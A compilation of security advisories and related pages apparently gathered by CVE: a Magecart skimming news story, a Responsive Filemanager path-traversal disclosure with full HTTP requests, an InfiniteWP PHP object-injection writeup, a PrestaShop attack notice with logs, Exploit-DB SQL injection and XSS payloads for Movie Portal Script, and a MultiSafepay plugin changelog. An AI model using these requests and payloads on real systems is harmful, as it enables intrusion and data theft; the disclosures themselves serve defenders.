Three restaurant ordering platforms MenuDrive, Harbortouch, and InTouchPOS were the target of two Magecart skimming campaigns that resulted in the compromise of at least 311 restaurants.
The trio of breaches has led to the theft of more than 50,000 payment card records from these infected restaurants and posted for sale on the dark web.
"The online ordering platforms MenuDrive and Harbortouch

Three restaurant ordering platforms MenuDrive, Harbortouch, and InTouchPOS were the target of two Magecart skimming campaigns that resulted in the compromise of at least 311 restaurants.

The trio of breaches has led to the theft of more than 50,000 payment card records from these infected restaurants and posted for sale on the dark web.

"The online ordering platforms MenuDrive and Harbortouch were targeted by the same Magecart campaign, resulting in e-skimmer infections on 80 restaurants using MenuDrive and 74 using Harbortouch," cybersecurity firm Recorded Future revealed in a report.

"InTouchPOS was targeted by a separate, unrelated Magecart campaign, resulting in e-skimmer infections on 157 restaurants using the platform."

Magecart actors have a history of infecting e-commerce websites with JavaScript skimmers to steal online shoppers' payment card data, billing information, and other personally identifiable information (PII).

The first set of activities is believed to have started around January 18, 2022, and continued until the malicious domain used in the campaign was blocked on May 26. The InTouchPOS campaign, on the other hand, has remained active since November 12, 2021.

It's worth noting that the data exfiltration domain used in the infections of MenuDrive and Harbortouch has also been identified by the U.S. Federal Bureau of Investigation (FBI) in a May 2022 flash alert.

The attacks entail inserting malicious PHP code into the businesses' online checkout pages by taking advantage of known security flaws in the services to scrape and transmit the customer data to a server under the attacker's control.

The idea is that by targeting online ordering platforms, it can lead to a scenario where when even a single platform is attacked, dozens or even hundreds of restaurants can have their transactions compromised, which enables "cybercriminals to steal vast amounts of customer payment card data disproportionate to the number of systems they actually hack."

The development is significant for a number of reasons. First, the intrusions are a departure from the threat actor's traditional targeting of the Magento e-commerce platform, a fact exemplified by the uptick in skimmer attacks aimed at a WordPress plugin named WooCommerce.

Furthermore, it serves to highlight how Magecart campaigns are now singling out small, local restaurants that rely on third-party software from lesser-known online ordering services in lieu of designing their own checkout web pages, effectively widening the pool of attack vectors.

"Centralized ordering platforms servicing multiple merchants offer a unique opportunity for Magecart threat actors to collect customer PII and payment card data," the researchers said. "Cybercriminals' increasing interest in targeting online ordering platforms represents a new dimension of risk for restaurants."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Magecart Hacks Food Ordering Systems to Steal Payment Data from Over 300 Restaurants

A vulnerability was found in Tecrail Responsive Filemanger up to 9.10.x and classified as critical. The manipulation leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 9.11.0 is able to address this issue. It is recommended to upgrade the affected component.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives****Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure/Deletion**

_From_: Wiswat A <wiswat.a () gmail com>  
_Date_: Wed, 8 Feb 2017 00:28:23 +0700  

\[+\] Exploit Title: Responsive Filemanger <= 9.11.0 - Arbitrary File
Disclosure/Deletion
\[+\] Date: 7 Feb 2017
\[+\] Vulnerability and Exploit Author: Wiswat Aswamenakul
\[+\] Vendor Homepage: http://www.responsivefilemanager.com/
\[+\] Affected version: only tested on 9.11.0 and 9.7.3 (other versions
might be affected)
\[+\] Tested on: Ubuntu 14.04, PHP 5.5.9
\[+\] Category: webapps

\[+\] Description
Responsive filemanger is a PHP based file manager that make use of AJAX
technology. It has various useful features. One of them is copy/cut and
paste files. However, the copy/cut feature does not santize file name
that will be copied/cut. Therefore, it is possible for attackers to
copied/cut any files including PHP files and paste them to overwrite
existing image files. Then, the attackers could download the overwritten
image files to read the content of the copied/cut files. Moreover, for
the cut feature, it can cause the original files to be deleted as well.

\[+\] Exploit
1. Upload a normal image file (jpg, png, gif) to a server
2. Right click at any files, select copy and capture the request with
Burp Suite (or any local proxy)
3. Change parameter "path" to any file name that we would like to
download, for example, path=../filemanager/config/config.php

###
POST /fm/filemanager/ajax\_calls.php?action=copy\_cut HTTP/1.1
Host: 192.168.1.128
Content-Length: 53
Accept: \*/\*
Origin: http://192.168.1.128
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer:
http://192.168.1.128/fm/filemanager/dialog.php?editor=0&type=0&lang=en\_EN&popup=0&crossdomain=0&field\_id=&relative\_url=0&akey=key&fldr=%2F&5869110e2a073
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: last\_position=%2F; PHPSESSID=lenmc074o86fe2sq7i1dtnh8j0
Connection: close

path=../filemanager/config/config.php&sub\_action=copy
###

4. Go to any sub directory, right click at any files, intercept the
request with burp, select "Paste to this directory"
5. Change parameter "path" to the image file uploaded in step 1, for
example, path=subdir/size.png

###
POST /fm/filemanager/execute.php?action=paste\_clipboard HTTP/1.1
Host: 192.168.1.128
Content-Length: 20
Accept: \*/\*
Origin: http://192.168.1.128
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer:
http://192.168.1.128/fm/filemanager/dialog.php?editor=0&type=0&lang=en\_EN&popup=0&crossdomain=0&field\_id=&relative\_url=0&akey=key&fldr=subdir%2F&5869110f9a268
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: last\_position=subdir%2F; PHPSESSID=lenmc074o86fe2sq7i1dtnh8j0
Connection: close

path=subdir/size.png
###

6. Download the image file uploaded in step 1, it will contain content
of the file specified in step 3

\[+\] Note (about another issue I found)
During this report, I found another separated issue with the attack
filtering that only check for "../" but not "..\\" which can be used to
bypass all filters if the application runs on Windows server and reported
the issue to the owner as well. However, I found out that this issue was
found by a guy from hacktizen and detailed in following blog post
http://hacktizen.blogspot.com/2016/06/responsive-filemanager-9102-directory.html
So, the credit goes for the guy who firstly reported. Perhaps, the guy from
hackitizen did not contact the owner of responsive filemanger or there are
any problems with communication. Therefore, the issue remains unresolved.

\[+\] Timeline
- 02/01/2017: Contact Owner
- 05/02/2017: Patched version is available
- 07/02/2017: Public Advisory

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure/Deletion** _Wiswat A (Feb 07)_

CVE-2017-20145: Full Disclosure: Responsive Filemanger <= 9.11.0

A vulnerability was found in InfiniteWP Client Plugin 1.5.1.3/1.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to injection. The attack can be launched remotely. Upgrading to version 1.6.1.1 is able to address this issue. It is recommended to upgrade the affected component.

Yorick Koster, June 2016

**InfiniteWP Client WordPress Plugin unauthenticated PHP Object injection vulnerability****Abstract**

A PHP Object injection vulnerability was found in the InfiniteWP Client WordPress Plugin, which can be used by an unauthenticated user to instantiate arbitrary PHP Objects. Using this vulnerability it is possible to execute arbitrary PHP code.

**Contact**

For feedback or questions about this advisory mail us at sumofpwn at securify.nl

**The Summer of Pwnage**

This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.

**OVE ID**

OVE-20160803-0004

**Tested versions**

This issue was successfully tested on the InfiniteWP Client WordPress Plugin version 1.5.1.3/1.6.0.

**Fix**

Input validation was added to version 1.6.1.1 of InfiniteWP Client to mitigate this issue. JSON support was added to InfiniteWP Client version 1.6.3.2, which will eventually replace the serialized data.

**Introduction**

The InfiniteWP Client WordPress Plugin allows users to manage unlimited number of WordPress sites from their own server. A PHP Object injection vulnerability was found in the InfiniteWP Client WordPress Plugin, which can be used by an unauthenticated user to instantiate arbitrary PHP Objects.

**Details**

This issue is possible due to an unsafe call to _unserialize()_ in the _iwp\_mmb\_parse\_request()_ method. The input is taken directly from the POST body as can be seen in the following code fragment:

_init.php:_

if( !function\_exists ('iwp\_mmb\_parse\_request')) {  
   function iwp\_mmb\_parse\_request()  
   {  
      global $HTTP\_RAW\_POST\_DATA;  
      $HTTP\_RAW\_POST\_DATA\_LOCAL = NULL;  
      **$HTTP\_RAW\_POST\_DATA\_LOCAL = file\_get\_contents('php://input');**  
      if(empty($HTTP\_RAW\_POST\_DATA\_LOCAL)){  
         if (isset($HTTP\_RAW\_POST\_DATA)) {  
            $HTTP\_RAW\_POST\_DATA\_LOCAL = $HTTP\_RAW\_POST\_DATA;  
         }  
      }

   
      ob\_start();

   
      global $current\_user, $iwp\_mmb\_core, $new\_actions, $wp\_db\_version, $wpmu\_version, $\_wp\_using\_ext\_object\_cache;  
      **$data = base64\_decode($HTTP\_RAW\_POST\_DATA\_LOCAL);**  
      if ($data){  
         //$num = @extract(unserialize($data));  
         **$unserialized\_data = @unserialize($data);**  
         if(isset($unserialized\_data\['params'\])){   
         $unserialized\_data\['params'\] = iwp\_mmb\_filter\_params($unserialized\_data\['params'\]);  
      }

It has been confirmed that this issues can be used to execute arbitrary PHP code.

CVE-2016-15004: Summer of Pwnage! July 1-29, Amsterdam.

PrestaShop 1.6.0.10 through 1.7.x before 1.7.8.2 allows remote attackers to execute arbitrary code, aka a "previously unknown vulnerability chain" related to SQL injection, as exploited in the wild in July 2022.

Attackers have found a way to use a security vulnerability to carry out arbitrary code execution in servers running PrestaShop websites. For details, please read the entire article.

**What’s happening**

The maintainer team has been made aware that malicious actors are exploiting a combination of known and unknown security vulnerabilities to inject malicious code in PrestaShop websites, allowing them to execute arbitrary instructions, and potentially steal customer’s payment information.

While investigating this attack, we found a previously unknown vulnerability chain that we are fixing. At the moment, however, we cannot be sure that it’s the only way for them to perform the attack. To the best of our understanding, this issue seems to concern shops based on versions 1.6.0.10 or greater, subject to SQL injection vulnerabilities. Versions 1.7.8.2 and greater are not vulnerable unless they are running a module or custom code which itself includes an SQL injection vulnerability. Note that versions 2.0.0~2.1.0 of the Wishlist (blockwishlist) module are vulnerable.

**How the attack works**

The attack requires the shop to be vulnerable to SQL injection exploits. To the best of our knowledge, the latest version of PrestaShop and its modules are free from these vulnerabilities. We believe attackers are targeting shops using outdated software or modules, vulnerable third-party modules, or a yet-to-be-discovered vulnerability.

According to our conversations with shop owners and developers, the recurring modus operandi looks like this:

1.  The attacker submits a POST request to the endpoint vulnerable to SQL injection.
2.  After approximately one second, the attacker submits a GET request to the homepage, with no parameters. This results in a PHP file called blm.php being created at the root of the shop’s directory.
3.  The attacker now submits a GET request to the new file that was created, blm.php, allowing them to execute arbitrary instructions.

After the attackers successfully gained control of a shop, they injected a fake payment form on the front-office checkout page. In this scenario, shop customers might enter their credit card information on the fake form, and unknowingly send it to the attackers.

While this seems to be the common pattern, attackers might be using a different one, by placing a different file name, modifying other parts of the software, planting malicious code elsewhere, or even erasing their tracks once the attack has been successful.

**What to do to keep your shop safe**

First of all, make sure that your shop and all your modules are updated to their latest version. This should prevent your shop from being exposed to known and actively exploited SQL injection vulnerabilities.

According to our current understanding of the exploit, attackers might be using MySQL Smarty cache storage features as part of the attack vector. This feature is rarely used and is disabled by default, but it can be enabled remotely by the attacker. Until a patch has been published, we recommend physically disabling this feature in PrestaShop’s code in order to break the attack chain.

To do so, locate the file config/smarty.config.inc.php on your PrestaShop install, and remove lines 43-46 (PrestaShop 1.7) or 40-43 (PrestaShop 1.6):

    if (Configuration::get('PS_SMARTY_CACHING_TYPE') == 'mysql') {
        include _PS_CLASS_DIR_.'Smarty/SmartyCacheResourceMysql.php';
        $smarty->caching_type = 'mysql';
    }
    

**How to tell if you have been affected**

Consider looking at your server’s access log for the attack pattern explained above. This is an example shared by a community member:

    - [14/Jul/2022:16:20:56 +0200] "POST /modules/XXX/XXX.php HTTP/1.1" 200 82772 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14"
     
    - [14/Jul/2022:16:20:57 +0200] "GET / HTTP/1.1" 200 63011 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
     
    - [14/Jul/2022:16:20:58 +0200] "POST /blm.php HTTP/1.1" 200 82696 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
    

(Note: the vulnerable module’s path has been modified for security reasons)

Be aware that not finding this pattern on your logs doesn’t necessarily mean that your shop has not been affected by the attack: the complexity of the exploit means that there are several ways of performing it, and attackers might also try and hide their tracks.

Consider contacting a specialist to perform a full audit of your site and make sure that no file has been modified nor any malicious code has been added.

**Additional information**

A patch version is currently being tested, and should be released soon.

We would like to take the opportunity to stress out once more the importance of keeping your system updated to prevent such attacks. This means regularly updating both your PrestaShop software and its modules, as well as your server environment.

CVE-2022-36408: Major Security Vulnerability on PrestaShop Websites

A vulnerability was found in Itech Movie Portal Script 7.36. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /show_news.php. The manipulation of the argument id with the input AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT (ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) leads to sql injection (Error). The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

**Movie Portal Script 7.36 - Multiple Vulnerabilities**

**Platform:****PHP**

**Date:****2017-01-25**

  

    Exploit Title : Movie Portal Script v7.36 - Multiple Vulnerability
    Google Dork :    -
    Date : 20/01/2017
    Exploit Author : Marc Castejon <marc@silentbreach.com>
    Vendor Homepage : http://itechscripts.com/movie-portal-script/
    Software Link: http://movie-portal.itechscripts.com
    Type : webapps
    Platform: PHP
    Sofware Price and Demo : $250
    
    ------------------------------------------------
    Type: Error Based Sql Injection
    Vulnerable URL:http://localhost/[PATH]/show_news.php
    Vulnerable Parameters: id
    Method: GET
    Payload:  AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT
    (ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM
    INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    
    -----------------------------------------------
    Type: Reflected XSS
    Vulnerable URL: http://localhost/[PATH]/movie.php
    Vulnerable Parameters : f=
    Payload:<img src=i onerror=prompt(1)>
    ---------------------------------------------
    Type: Error Based Sql Injection
    Vulnerable URL:http://localhost/[PATH]/show_misc_video.php
    Vulnerable Parameters: id
    Method: GET
    Payload:  AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT
    (ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM
    INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    -----------------------------------------------
    
    Type:Union Query Sql Injection
    Vulnerable URL:http://localhost/[PATH]/movie.php
    Vulnerable Parameters: f
    Method: GET
    Payload:  -4594 UNION ALL SELECT
    NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7871,0x6452766b715a73727a634a497a7370474e6744576c737a6a436a6e566e546c68425a4b426a53544d,0x71627a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    -----------------------------------------------
    Type: Union Query Sql Injection
    Vulnerable URL:http://localhost/[PATH]/artist-display.php
    Vulnerable Parameters: act
    Method: GET
    Payload:  UNION ALL SELECT
    NULL,CONCAT(0x71706a7871,0x6b704f42447249656672596d4851736d486b45414a53714158786549644646716377666471545553,0x717a6a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    -----------------------------------------------
    
    Type: Error Based Sql Injection
    Vulnerable URL:http://localhost/[PATH]/film-rating.php
    Vulnerable Parameters: v
    Method: GET
    Payload:  AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT
    (ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM
    INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

CVE-2017-20139: Offensive Security’s Exploit Database Archive

Cross-Site Request Forgery (CSRF) vulnerability in Sygnoos Popup Builder plugin <= 4.1.11 at WordPress allows an attacker to update plugin settings.

CVE-2022-29495: Popup Builder – Create highly converting, mobile friendly marketing popups.

Multiple Broken Access Control vulnerabilities in Social Share Buttons by Supsystic plugin <= 2.2.3 at WordPress.

CVE-2022-27235: Social Share Buttons by Supsystic

Unauthenticated Arbitrary File Read vulnerability in MultiSafepay plugin for WooCommerce plugin <= 4.13.1 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**About MultiSafepay**  
MultiSafepay is a collecting payment service provider which means we take care of the agreements, technical details and  
payment collection required for each payment method. You can start selling online today and manage all your transactions  
from one place.

**Supported Payment Methods**

Payment methods:  
\* AfterPay  
\* Alipay  
\* American Express  
\* Apple Pay  
\* Bank transfer  
\* Bancontact  
\* Belfius  
\* Betaal per Maand  
\* Dotpay  
\* E-Invoicing  
\* EPS  
\* Giropay  
\* iDEAL  
\* in3  
\* KBC/CBC  
\* Klarna  
\* Maestro  
\* Mastercard  
\* Pay After Delivery  
\* PayPal  
\* Paysafecard  
\* Request to Pay  
\* SEPA Direct Debit  
\* SOFORT Banking  
\* Trustly  
\* Visa

Giftcards:  
\* Baby Cadeaubon  
\* Beauty & Wellness  
\* Boekenbon  
\* Fashioncheque  
\* Fashion Giftcard  
\* Gezondheidsbon  
\* GivaCard  
\* Good4fun Giftcard  
\* Goodcard  
\* Fietsbon  
\* Nationale Tuinbon  
\* Parfum Cadeaukaart  
\* Podium  
\* Sport & Fit  
\* VVV Giftcard  
\* Webshop gift card  
\* Wellness gift card  
\* Wijncadeau  
\* Winkelcheque  
\* YourGift

To use the plugin you need a MultiSafepay account.  
Create an account

**Automatic Installation**

*   Search for the ‘MultiSafepay’ plugin via ‘Add New’ from the WordPress menu
*   Press the ‘Install now’ button

**Manual Installation**

*   Download the plugin from the WordPress Plugin Directory
*   Unzip the downloaded file to a local directory
*   Upload the directory ‘multisafepay’ to /wp-content/plugins/ on the remote server

**Configuration**

*   Activate the ‘MultiSafepay’ plugin via ‘Plugin’ from the WordPress menu
*   Navigate to _WooCommerce_ -> _MultiSafepay Settings_
*   In _Account_ tab, set the API key. Information about the API key can be found on our API key page. Click on _Save changes_ button.
*   Go to _Order Status_ tab and confirm the match between WooCommerce order statuses and MultiSafepay order statuses. Click on _Save changes_ button.
*   Go to _Options_ tab and confirm the settings for each field. Click on _Save changes_ button.
*   Navigate to _WooCommerce_ -> _Settings_ -> _Payments_. Click on the payment methods you would like to offer, check and set or confirm the settings for those been enable. Click on _Save changes_ button.

**How can I install the plugin for WooCommerce?**

*   Installation instruction can be found in our Manual page.

**How can I update the plugin for WooCommerce?**

Before you update the plugin, we strongly recommend you the following:

*   Make sure you have a backup of your production environment
*   Test the plugin in a staging environment.
*   Go to our Manual page, download the plugin and follow the instructions from step 2.

**How can I generate a payment link in the backend of WooCommerce?**

It is possible to generate a payment link when an order has been created at the backend in WooCommerce.  
The customer will receive the payment link in the email send by WooCommerce with the order details. Also the payment link will be added to the order notes.

Please follow these steps:

1.  Login into your backend and navigate to WooCommerce -> Orders -> Add order.
2.  Register the order details as explained in WooCommerce documentation.
3.  In “Order actions” panel; select the option “Email invoice / order details to customer”.
4.  Click on “Create” order button.
5.  An email will be sended to the customer with the details of the order and a payment link to finish the order.
6.  The payment link will be available for the customer in their private account area, in “Orders” section.

**Can I refund orders?**

Yes, you can fully or partially refund transactions directly from your WooCommerce backend for all payment methods, except for Billing Suite payment methods in which it is only possible to process full refunds.  
You can also refund from your MultiSafepay Control

MultiSafe plugin is nice as the plugin shows available currency Based on Geolocation IP.

Smoothless integration of the world's most versatile payment system into Woocommerce

Read all 2 reviews

“MultiSafepay plugin for WooCommerce” is open source software. The following people have contributed to this plugin.

Contributors

*    multisafepayplugin

**Release Notes – WooCommerce 4.17.2 (Jul 22st, 2022)****Fixed**

*   PLGWOOS-825: Fix an issue in which some payment methods are not being shown in the checkout, because of the setting field country selector is assuming the wrong value in some cases

**Release Notes – WooCommerce 4.17.1 (Jul 22st, 2022)****Changed**

*   PLGWOOS-817: Improvement in the escaping of the outputs of the settings page

**Release Notes – WooCommerce 4.17.0 (Jul 21st, 2022)****Removed**

*   PLGWOOS-816: Remove validation to check if a gateway is enabled in the merchant account, before activate the WooCommerce payment method
*   PLGWOOS-818: Remove upgrade notice functionality in plugin list page

**Changed**

*   PLGWOOS-817: Improvement in sanitization and validation of the inputs, and escaping the outputs

**Release Notes – WooCommerce 4.16.0 (Jul 20th, 2022)****Added**

*   DAVAMS-490: Add MyBank payment method

**Removed**

*   PLGWOOS-811: Remove download plugin logs button and related methods

**Release Notes – WooCommerce 4.15.0 (May 25th, 2022)****Added**

*   DAVAMS-470: Add terms and conditions checkbox to AfterPay

**Changed**

*   PLGWOOS-805: Declare support for WordPress 6.0

**Release Notes – WooCommerce 4.14.0 (May 19th, 2022)****Added**

*   DAVAMS-476: Add Alipay+

**Changed**

*   PLGWOOS-804: Use default locale if get\_locale returns null to prevent third party plugin errors
*   PHPSDK-93: Upgrade the PHP-SDK dependency to 5.5.0

**Release Notes – WooCommerce 4.13.1 (Mar 23th, 2022)****Added**

*   PLGWOOS-792: Declare support for WordPress 5.9.2 and WooCommerce 6.3.1
*   PLGWOOS-790: Improvement on debug mode, logging the body of the POST notification request

**Fixed**

*   PLGWOOS-791: Fix error when WooCommerce order is not found after receive a valid POST notification

**Release Notes – WooCommerce 4.13.0 (Feb 1st, 2022)****Added**

*   PLGWOOS-770: Add payment component support for payment options: Visa, Mastercard, Maestro and American Express
*   PLGWOOS-774: Add support to process ‘smart\_coupon’ coupons from Smart Coupons third party plugin
*   PLGWOOS-775: Log shopping cart content when debug mode is enabled

**Release Notes – WooCommerce 4.12.0 (Jan 13th, 2022)****Added**

*   PLGWOOS-769: Add new filter ‘multisafepay\_merchant\_item\_id’ to allow third party developers overwrite the merchant\_item\_id property within the ShoppingCart object

**Changed**

*   PLGWOOS-744: Update ‘Betaal per Maand’ default max\_amount value, according with new product rules
*   PLGWOOS-759: Rebrand Sofort payment method

**Release Notes – WooCommerce 4.11.0 (Jan 4th, 2022)****Added**

*   PLGWOOS-745: Add Payment Component

**Changed**

*   PLGWOOS-765: Refactor PaymentMethodsController::generate\_orders\_from\_backend() to work only with one argument and avoiding conflicts with third party plugins
*   PLGWOOS-745: Tokenization now works through the Payment Component

**Fixed**

*   PLGWOOS-763: Fix error on plugin list when application can not connect with wordpress network

**Release Notes – WooCommerce 4.10.0 (Dec 13th, 2021)****Added**

*   PLGWOOS-748: Add PHP-SDK version to system report
*   PLGWOOS-758: Add filter to turn notifications to GET method

**Removed**

*   DAVAMS-460: Remove ING Home’Pay

**Changed**

*   PLGWOOS-695: Replace HTTP Client, use WP\_HTTP instead kriswallsmith/buzz
*   PLGWOOS-749: Replace logo of Bancontact for new one

**Fixed**

*   PLGWOOS-752: Fix missing placeholder for Test API Key input field in settings page

**Release Notes – WooCommerce 4.9.0 (Oct 18th, 2021)****Added**

*   PLGWOOS-715: Add 2 “Generic Gateways” which include a flexible gateway code that allows any merchant to connect to almost every payment method we offer.
*   PLGWOOS-746: Declare support for WordPress 5.8.1 and WooCommerce 5.8.0

**Changed**

*   PLGWOOS-740: Improve the helper text of the Google Analytics ID setting field, adding a link to Documentation Center
*   PLGWOOS-747: Upgrade the PHP-SDK component to 5.3.0

**Fixed**

*   PLGWOOS-739: Fix fatal error related with undefined method when processing orders using iDEAL QR
*   PLGWOOS-743: Fix broken links to Documentation Center in settings page

**Release Notes – WooCommerce 4.8.3 (Sep 6th, 2021)****Fixed**

*   PLGWOOS-737: Fix error related with refunds by updating the PHP-SDK to 5.2.1

**Release Notes – WooCommerce 4.8.2 (Sep 2nd, 2021)****Added**

*   PLGWOOS-730: Declare support for WooCommerce 5.6.0

**Release Notes – WooCommerce 4.8.1 (Aug 9th, 2021)****Fixed**

*   PLGWOOS-727: Show error message from the API in the checkout page, when there is an error on direct transactions

**Release Notes – WooCommerce 4.8.0 (Aug 4th, 2021)****Added**

*   PLGWOOS-723: Declare support for WooCommerce 5.5.2 and WordPress 5.8
*   PLGWOOS-711: Add missing titles in setting pages

**Changed**

*   PLGWOOS-718: Remove PSP ID string when register the transaction ID in WC\_Order->payment\_complete()

**Release Notes – WooCommerce 4.7.0 (Jun 23th, 2021)****Added**

*   PLGWOOS-706: Declare support for WooCommerce 5.4.1

**Changed**

*   PLGWOOS-672: Change notification method from GET to POST by default

**Fixed**

*   PLGWOOS-704: Log errors in the MultiSafepay log file, when processing notifications.

**Release Notes – WooCommerce 4.6.0 (May 19th, 2021)****Added**

*   PLGWOOS-625: Add log section in MultiSafepay settings page
*   PLGWOOS-666: Add MultiSafepay system status section in settings page
*   PLGWOOS-376: Add support to show upgrade notices in plugin list
*   PLGWOOS-657: Add nl\_BE language

**Fixed**

*   PLGWOOS-694: Fix notification for orders fully paid with gift cards
*   PLGWOOS-692: Fix Second Chance within the orderRequest object
*   PLGWOOS-654: Fix the gateway\_id assigned to the properties of each token

**Release Notes – WooCommerce 4.5.1 (Apr 7th, 2021)****Fixed**

*   PLGWOOS-661: Fix payment methods ids to match list of gateway lists keys, which was producing an error to process notification for Sofort payments
*   PLGWOOS-663: Fix stock decreasing error, in relation with Bank Transfer gateway and notification flows

**Release Notes – WooCommerce 4.5.0 (Mar 31th, 2021)****Fixed**

*   PLGWOOS-659: Fix initialization of the plugin on multisite environments in which WooCommerce has been activate network wide

**Added**

*   PLGWOOS-534: Add generic gateway

**Release Notes – WooCommerce 4.4.1 (Mar 25th, 2021)****Fixed**

*   PLGWOOS-653: Fix overwriting initial order status when transaction is initialized

**Release Notes – WooCommerce 4.4.0 (Mar 23th, 2021)****Fixed**

*   PLGWOOS-648: Return 0 as tax rate, if WooCommerce taxes are disabled but tax rules are registered
*   PLGWOOS-647: Add verification to check if the token used in the transaction belongs to the customer

**Added**

*   PLGWOOS-651: Add setting to select type of transaction in SEPA Direct Debit, E-Invoicing, in3, Santander Consumer Finance, AfterPay and iDEAL
*   PLGWOOS-644: Add setting to select type of transaction in Pay After Delivery
*   PLGWOOS-640: Add setting to select type of transaction in Bank Transfer

**Release Notes – WooCommerce 4.3.0 (Mar 18th, 2021)****Fixed**

*   PLGWOOS-626: Fix order not being cancelled when customer cancels the order
*   PLGWOOS-630: Fix include shipping item in full refund of billing suite payment methods

**Added**

*   PLGWOOS-629: Add shipping item to the order request, even if this one is free
*   PLGWOOS-631: Add delivery address in order request even if the shipping amount is 0
*   PLGWOOS-634: Add settings field to redirect to checkout page or cart page on cancelling the order
*   PLGWOOS-635: Add suggestion to set default initial order status for bank transfer to wc-on-hold
*   PLGWOOS-636: Add notification endpoint from version 3.8.0 to process deprecated notifications

**Changed**

*   PLGWOOS-622: Change notification url for all payment methods to a single notification url

**Release Notes – WooCommerce 4.2.2 (Mar 16th, 2021)****Fixed**

*   PLGWOOS-632: Fix undefined method get\_the\_user\_ip
*   PLGWOOS-621: Fix division by zero when fee price is 0

**Release Notes – WooCommerce 4.2.1 (Mar 11th, 2021)****Fixed**

*   PLGWOOS-613: Fix error related with multiple forwarded IPs by updating the PHP-SDK to 5.0.1

**Added**

*   PLGWOOS-398: Add support to change the data in the OrderRequest using WordPress filters

**Changed**

*   PLGWOOS-614: Avoid changing order status if transaction is partially refunded

**Release Notes – WooCommerce 4.2.0 (Mar 9th, 2021)****Changed**

*   PLGWOOS-602: Move invoice and shipped settings field from order status tab to options tab
*   PLGWOOS-602: Remove completed status from order status tab in settings page
*   PLGWOOS-601: Change default status for declined transactions from wc-cancelled to wc-failed

**Fixed**

*   PLGWOOS-599: Fix typo in string message when payment method changes
*   PLGWOOS-598: Replace hardcoded url using plugins\_url function
*   PLGWOOS-605: Fix description of country filter field

**Added**

*   PLGWOOS-603: Add setting field for custom order description
*   PLGWOOS-604: Add forwarded IP to the CustomerDetails object
*   PLGWOOS-597: Support for orders with is\_vat\_exempt
*   PLGWOOS-606: Add chargedback transaction status in plugin settings

**Release Notes – WooCommerce 4.1.8 (Mar 5th, 2021)****Changed**

*   PLGWOOS-593: Register PSP ID in WooCommerce order using order complete payment method
*   PLGWOOS-593: Change notification method on completed status to use $order->complete\_payment()

**Fixed**

*   PLGWOOS-594: Fix Credit Card payment method form, to show description if customer is not logged in

**Release Notes – WooCommerce 4.1.7 (Mar 3th, 2021)****Changed**

*   PLGWOOS-579: Remove warning message on validation, when enabling CREDITCARD gateway

**Fixed**

*   PLGWOOS-584: Fix conflict with third party plugins related with Discovery exception
*   PLGWOOS-585: Set MultiSafepay transaction as shipped or invoiced using order number instead of order id

**Release Notes – WooCommerce 4.1.6 (Mar 2nd, 2021)****Added**

*   PLGWOOS-574: Add locale support

**Changed**

*   PLGWOOS-575: Change settings page capability requirement from manage\_options to manage\_woocommerce

**Fixed**

*   PLGWOOS-580: Show credit card payment method description in checkout
*   PLGWOOS-569: Remove class that trigger validation styles for ideal select in checkout page

**Release Notes – WooCommerce 4.1.5 (Feb 24th, 2021)****Fixed**

*   PLGWOOS-552: Fix product item price with discounts introduced by third party plugins (#252)

